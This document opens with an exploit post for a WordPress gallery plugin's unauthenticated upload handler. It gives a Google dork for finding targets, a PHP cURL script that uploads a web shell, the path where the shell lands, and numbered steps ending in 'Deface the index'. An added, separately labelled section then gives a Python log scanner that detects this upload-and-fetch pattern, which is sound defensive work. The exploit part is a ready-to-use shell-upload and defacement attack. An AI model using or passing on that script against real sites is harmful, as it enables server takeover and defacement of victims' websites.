Google dork: inurl:/wp-content/plugins/complete-gallery-manager/
Exploit: /wp-content/plugins/complete-gallery-manager/frames/upload-images.php
PHP script:
<?php
// Local file that is sent to the plugin's upload handler
$uploadfile="asu.php";
$ch = curl_init("http://site/wp-content/plugins/complete-gallery-manager/frames/upload-images.php");
curl_setopt($ch, CURLOPT_POST, true);
// The handler reads the upload from the 'qqfile' form field
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('qqfile'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
// Print the server's response
print "$postResult";
?>
Uploaded shell access path: http://site/wp-content/2013/09/asu.php
1. Replace http://site with your target
2. Run the PHP script with XAMPP
3. Enter the shell
4. Deface the index
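
A defender-side check for the request pattern described above, as an added example that is not part of the original post: it scans web-server access logs for POSTs to the plugin's upload endpoint and for PHP files then requested from under /wp-content/. The combined log format, the function name and the sample lines are assumptions constructed for illustration.

```python
import re

# Upload endpoint named on this page (path only, lower-case for comparison).
UPLOAD_ENDPOINT = "/wp-content/plugins/complete-gallery-manager/frames/upload-images.php"
# Combined log format: client, identity, user, [time], "METHOD path PROTO", status.
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')
# PHP requested under /wp-content/ but outside plugins/ and themes/.
DROPPED_PHP_RE = re.compile(r"^/wp-content/(?!plugins/|themes/)[^?]*\.php(\?|$)", re.I)


def find_upload_abuse(lines):
    """Return (kind, client, path, status) tuples in log order."""
    findings = []
    uploaders = set()  # clients already seen posting to the endpoint
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not in the assumed log format
        client, method, path = m.group(1), m.group(2), m.group(3)
        status = int(m.group(4))
        if method == "POST" and path.split("?", 1)[0].lower() == UPLOAD_ENDPOINT:
            uploaders.add(client)
            findings.append(("upload-endpoint-post", client, path, status))
        elif DROPPED_PHP_RE.match(path):
            # Same client posted to the endpoint earlier: higher confidence.
            kind = "php-fetch-after-upload" if client in uploaders else "php-under-wp-content"
            findings.append((kind, client, path, status))
    return findings


# Constructed sample lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '198.51.100.7 - - [12/Sep/2013:10:00:01 +0000] "GET /wp-content/plugins/complete-gallery-manager/readme.txt HTTP/1.1" 200 512',
    '203.0.113.9 - - [12/Sep/2013:10:01:02 +0000] "POST /wp-content/plugins/complete-gallery-manager/frames/upload-images.php HTTP/1.1" 200 48',
    '203.0.113.9 - - [12/Sep/2013:10:01:05 +0000] "GET /wp-content/2013/09/asu.php HTTP/1.1" 200 1024',
    '198.51.100.7 - - [12/Sep/2013:10:02:00 +0000] "GET /wp-content/themes/twentythirteen/index.php HTTP/1.1" 200 0',
    '198.51.100.7 - - [12/Sep/2013:10:03:00 +0000] "GET /wp-content/uploads/2013/09/photo.jpg HTTP/1.1" 200 20480',
]

if __name__ == "__main__":
    for finding in find_upload_abuse(SAMPLE_LOG):
        print(finding)
```

A 200 response on the POST followed by a 200 on a PHP path under /wp-content/ from the same client is the combination to triage first; any hit means the plugin should be removed or updated and the upload directories checked for stray PHP files.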